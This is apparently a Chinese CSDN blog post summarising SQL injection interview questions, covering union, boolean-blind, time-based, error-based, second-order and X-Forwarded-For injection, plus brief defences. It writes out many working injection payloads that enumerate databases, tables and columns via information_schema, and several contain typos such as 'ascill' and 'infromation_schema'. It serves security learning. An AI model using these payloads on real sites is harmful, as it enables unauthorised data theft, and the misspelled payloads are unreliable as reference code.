SQL注入面试题个人总结

已于 2023-06-09 11:44:01 修改
阅读量747 收藏 6
点赞数 1
文章标签: sql 数据库 网络安全 web安全 mysql
于 2023-06-09 11:41:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55033105/article/details/131123991
版权

SQL注入的原理:

SQL注入的原理就是,用户输入字符向数据库请求数据时,对于输入的数据没有严格的过滤或者过滤不全,导致我们可以构造恶意SQL代码,直接在数据库执行查询。

SQL的类型有哪些:

从注入方法来看,常见的有 联合查询布尔盲注延时注入报错注入二次注入
其他的还有 宽字节、堆叠、搜索

避免SQL注入:
  • 预编译
  • 正则表达式过滤
  • 字符串过滤
  • 转码转译

联合查询注入:

联合注入是有回显的一种注入方式,手工注入的时候它每一步会在页面上显示,比较直观。
判断联合注入的时候,首先判断 注入点、注入类型、字段数、看回显

  • 数字型判断:
    过程:判断注入点,加单引号 ’ 报错看回显 ‘’
    加上 ’ and 1=1 正常执行
    加上 ’ and 1=2 页面无数据,但不报错
    确定是数字型:
    语句: SELECT * FROM USER WHERE id='11 ' AND 1=1 #

  • 字符型:
    过程:判断注入点,加单引号 ’ 看报错信息 ‘’’
    加上" and1=1 #页面正常,可以闭合

确定类型后,成功闭合后,查询字段数
闭合后+ order by 1 #
报错的前一个数就是字段数

构造语句查询数据库和表
' union select database() , version() #

	暴库,爆表,爆字段,爆数据

布尔盲注属于无回显的一种注入方式:

原理:因为开发关闭了服务器报错回显信息,我们看不到报错信息,然后猜数据
只能通过页面变化看语句能不能正常执行
或者是通过延时看否成功

  • 手工测试:

1、确定注入点后,加单引号,页面没信息,加单引号并且注释后,页面正常
闭合成功
’ and 1=1 没信息 | ’ and 1=1 --+ 有信息 | ’ and 1=2 --+ 没信息
存在布尔盲注

2、猜数据库长度:

?id = 1 ’ and (length(database()))>1 --+

直到页面报错前一位

3、猜数据库名:

?id = 1 ’ and ascii(substr(database(),1,1))>100–+

A-Z (65-90) a-z (97-122)
可以使用二分法,一位一位猜,直到全成功

4、猜表名

?id=1’ and (ascii (substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+

二分法直到报错前一位

5、猜字段名

?id = 1’ and (ascii(substr((select column_name from infromation_schema.columns
where table_name=‘users’ limit 1,1),1,1)))>50 –

6、猜数据

?id = 1’ and (ascii(substr((select id users limit 0,1),1,1)))>80–+

延时注入-盲注的一种

原理:通过构造延迟注入语句,查看页面响应时间来判断
应用场景,页面一直没变化,看不出来变化的时候,可以构造

and sleep(5)
响应时间会延迟响应5s
延时注入会用到布尔盲注的所有函数 length(),substr()、ascill() 函数
if函数 | select if (1= 1 , 1 , 2 ) | 1=1 TRUE返回 1 , FALSE返回 2
| select if (1= 2, 1 , 2 ) | 1=2 TRUE返回 1 , FALSE返回 2
sleep函数 | select sleep (5) ; | row in set (5.00 sec) 延时返回 5 s

1、查询数据库长度:

|?id=1 and if ((length=1),sleep(5),1) --+ 如果长度为1 延时5s

2、猜数据库名:

|?id=1 and if ((ascill(substr(datasase(),1,1))=100),sleep(5),1) --+

3、猜表名:

|?id=1 and if ((ascill(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=100),sleep(5),1)–+

4、猜字段名:

|?id=1 and if ((ascill(substr(select column_name from infromation_schema.columns where table_name=‘users’ limit 1,1)=100),sleep(5),1)–+

5、猜数据名:

|?id=1 and if ((ascii(substr((select id users limit 0,1)=100),sleep(5),1)–+

报错注入:

原理:利用数据库本身特性,利用函数爆出需要的信息,

函数:updataxml()、extractvalue()、floor()、exp()

| ?id =1 and updataxml(1,concat(0x7e,database(),0x7e),1) --+

updataxml 参数1:xml文档对象的名称 参数2:xpath格式的字符串 参数3:替换符合条件的数据

| ?id=1‘ and extractvalue(1,concat(0x7e,database()))

通过使用count()、floor()、rand()、group by四个条件形成主键重复的错误。其中:

|?id=-1‘ and (select 1 from (select count(*),concat(database(), floor(rand(0)2))x from information_schema.tables group by x)a)

floor(x):对参数x向下取整,比如floor(0.2)=0,floor(3.6)=3。
rand( ):生成一个0~1之间的随机浮点数。
count(*):统计某个表下总共有多少条记录。
group by x:按照(by)一定的规则(x)进行分组。

二次注入:

在第一次进行数据库插入的时候,借助特殊字符进行转译,但是插入到数据库中是转译后
的结果,一般使用 ’ 单引号,或者 # 拼接到数据库中,因为数据库对自己本身数据信任,没有过滤,
或者过滤不足,从而在第二次查询数据的时候被恶意引用拼接。导致数据泄露。

二次注入使用
在第一次向数据库插入数据的时候数据中的特殊字符会被函数进行转译但是转译后的插入到数据库中的。

数据还是原始数据
常见的函数,有:
addslashes、get_magic_quotes、mysql_escape_string、mysql_real_escape_sring
等函数对其中的特殊字符进行转译
因为第一次插入得数据使我们故意构造的,常见的构造有单引号 ’ 或者 # ,再次读取它构造SQL代码就会
完成恶意代码构造,拼凑成功行成二次注入。

XXF注入:

HTTP Header中存在X-Forwarded-for参数的调用

原理:XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种
该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。

hosts IP域名映射文件

当X-Forwarded-For值为*,意味着也可以用类似的sql注入语句代替*。

1、单引号测试,当 X-Forwarded-For:127.0.0.1’ 时:报错

2、可以构造报错注入 X-Forwarded-For:127.0.0.1’,updatexml(1,concat(0x7e,(select user()) ,0x7e),1)) #

admin ' #
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全面试-SQL注入总结
m0_60571990的博客
03-25 1561
网络安全面试-SQL注入总结
SQL注入相关【面试
热门推荐
anan的博客
12-09 1万+
本篇文章主要收集和SQL注入相关的面试,持续更新,当然由于博主的时间不太充裕,可能更新会不是很及时,但是相信我,再晚,他都会来!
Java面试:请解释Java中的SQL注入?如何防止SQL注入
码农超哥的博客
04-08 704
Java中的SQL注入是一种常见的网络攻击技术,攻击者通过在应用程序的输入字段中输入恶意的SQL代码,来破坏或操纵后端数据库的行为。这种攻击可以导致数据泄露、数据损坏甚至整个应用程序的崩溃。
SQL注入面试(相关)
xdjxi的博客
02-19 2182
sql注入分类 从注入参数类型分:数字型注入、字符型注入、搜索型注入注入方法分:基于报错、基于布尔盲注、基于时间盲注、联合查询、堆叠注入、内联查询注入、宽字节注入 从提交方式分:GET注入、POST注入、COOKIE注入、HTTP头注入 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 >原本程序要执行的SQL语句,拼接了用户输入的恶意数据 WAF的原理 WAF是Web应
面试中常问的SQL注入
m0_46467017的博客
08-20 2223
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节英文默认占一个字节,中文占两个字节。
面试准备的Sql注入原理、类型、防范、危害(1)
m0_52556798的博客
03-13 1288
在这里的话,我想着总结一下自己学sql时主要学的内容,当时想着尽量以问形式来总结的,比如:hr会怎样问;然后我再以求职者的口吻回答问总结肯定不够完善,之后遇到新的相关知识肯定还会补充,发出来也就是希望大家帮我看看还有哪些需要学习呢? 1.SQL注入有哪些危害? a.首先可能会有未授权的访问数据库,盗用用户个人信息,造成信息泄露;//未授权信息泄露 b.然后就是对数据库进行增删改查,比如私自添加或者删除管理员账号这些 //权限更改 增删改查 c.第三就是对网页进行篡改、发布违法信息,比如一个网站具有写
必收藏面试:什么是SQL注入?以及Mybatis中#号和$号之间的区别?
1点25的博客
02-03 781
先看两段代码,假如id的值为字符串"100",大家可以顺便想想每段代码最后拼接出来的SQL长什么样。字符串直接拼接参数通过占位符?和setString()方法拼接参数这两种方式有什么不同吗?通过占位符?看上去区别不大,但是对于id=100来说,id是varchar,100是int,对于mysql来说是要做类型转换的,这个过程其实是会导致问的,下篇文章再来分析,关注我的公众号:IT周瑜通过占位符?仔细看看,看出区别没,直接拼接参数的将能查出全部数据,因为or 1=1生效了,而通过?
Java面试解析之判断以及防止SQL注入
08-28
Java面试解析之判断以及防止SQL注入 Java防止SQL注入是目前软件开发中非常重要的一个安全问SQL注入攻击是目前黑客最常用的攻击手段,它的原理是利用数据库对特殊标识符的解析强行从页面向后台传入,改变SQL...
java中高级面试十大总结
04-08
Java作为一门广泛使用的编程语言,其中高级面试往往涵盖了多方面的知识点,旨在考察候选人的技术深度和广度。以下是对这些面试的详细解析: 1. **内存管理与垃圾回收** - Java的内存分为堆内存(Heap)和栈...
MySQL 面试-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL等数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
java面试总结资料
05-31
这份"java面试总结资料"涵盖了多个Java核心领域的关键知识点,包括但不限于: 1. **基础语法**:理解基本的数据类型(如整型、浮点型、字符型和布尔型),变量的声明与使用,以及运算符的优先级。同时,要熟悉...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
2024年SQL语句常考面试(干货满满).zip
03-16
内容涉及SQL的定义、数据库类型、SQL语言的不同分类(DDL、DML、DCL)、连接类型(内连接、左连接等)、索引的作用和原理、事务的概念及其ACID特性、SQL注入的防护、存储过程与函数的区别、触发器的功能、视图的使用...
5种方法防止 jsp被sql注入
收集盒 Book box
09-22 6443
一、 SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 ===========================================
Web安全之SQL注入_web注入(1),网络安全开发面试
最新发布
jixuczy的博客
04-15 967
10086’,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),‘地址’)-- -10086’,(select group_concat(table_name) from information_schema.tables where table_schema=database()),‘地址’)-- -
内容总结
Again yy
07-28 270
is_free_lock();举个简单的例子,你这个接口是分页查询的,但是你没对分页参数的大小做限制,调用的人万一一口气查Integer.MAX_VALUE一次请求就要你几秒,多几个并发你不就挂了么?缓存击穿嘛,这个跟缓存雪崩有点像,但是又有一点不一样,缓存雪崩是因为大面积的缓存失效,打崩了DB,而缓存击穿不同的是缓存击穿是指一个Key非常热点,在不停的扛着大并发,大并发集中对这一个点进行访问,当这个Key在失效的瞬间,持续的大并发就穿破缓存,直接请求数据库,就像在一个完好无损的桶上凿开了一个洞。...
【网络安全工程师面试合集】—邮件协议是如何被安全人员利用的?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
11-14 8986
大家好,我是Lex 喜欢欺负超人那个Lex 擅长领域:python开发、网络安全渗透、Windows域控Exchange架构 代码干货满满,建议收藏+实操!!!有问及需要,请留言哦~~ 2.8.1. 简介 2.8.1.1. SMTP SMTP (Simple Mail Transfer Protocol) 是一种电子邮件传输的协议,是一组用于从源地址到目的地址传输邮件的规范。不启用SSL时端口号为25,启用SSL时端口号多为465或994。 2.8.1.2. POP3 POP3..
java sql注入 面试_Java菜鸟面试突破系列之SQL注入
weixin_39859128的博客
02-27 106
Java菜鸟面试突破系列之SQL注入概念:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如诸多网站用户信息泄露大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入攻击。攻击步骤:a) 寻找注入点(如:登录界面、留言板等)b) 用户自己构造SQL语句(如:’ or 1=1# 或者其他注释形式,后...
【PHP面试11】PHP如何防止SQL注入
黑夜开发者的博客
06-25 1204
SQL注入攻击是一种常见的Web安全漏洞,可以采用多种方法来防止SQL注入攻击。使用PHP的预处理语句和绑定变量可以有效地避免这种攻击。预防SQL注入攻击的最佳实践包括验证用户输入数据、禁止拼接字符串、使用filter_input()函数等。
怎么防止sql注入面试
03-28
1. 使用参数化查询:将用户输入的数据作为参数传递给查询语句,而不是将其直接拼接在查询语句中。 2. 输入检查和过滤:对用户输入的数据进行检查和过滤,过滤掉不合法的字符和语句。 3. 最小化权限:给数据库用户分配最小化的权限,只允许其进行必要的操作。 4. 避免使用动态SQL:尽量避免使用动态SQL语句,特别是在用户的输入中包含了未经处理的内容时。 5. 使用ORM框架:使用ORM框架可以自动进行参数化查询,减少SQL注入漏洞的可能性。 6. 定期更新数据库:定期更新数据库,修补已知的SQL注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值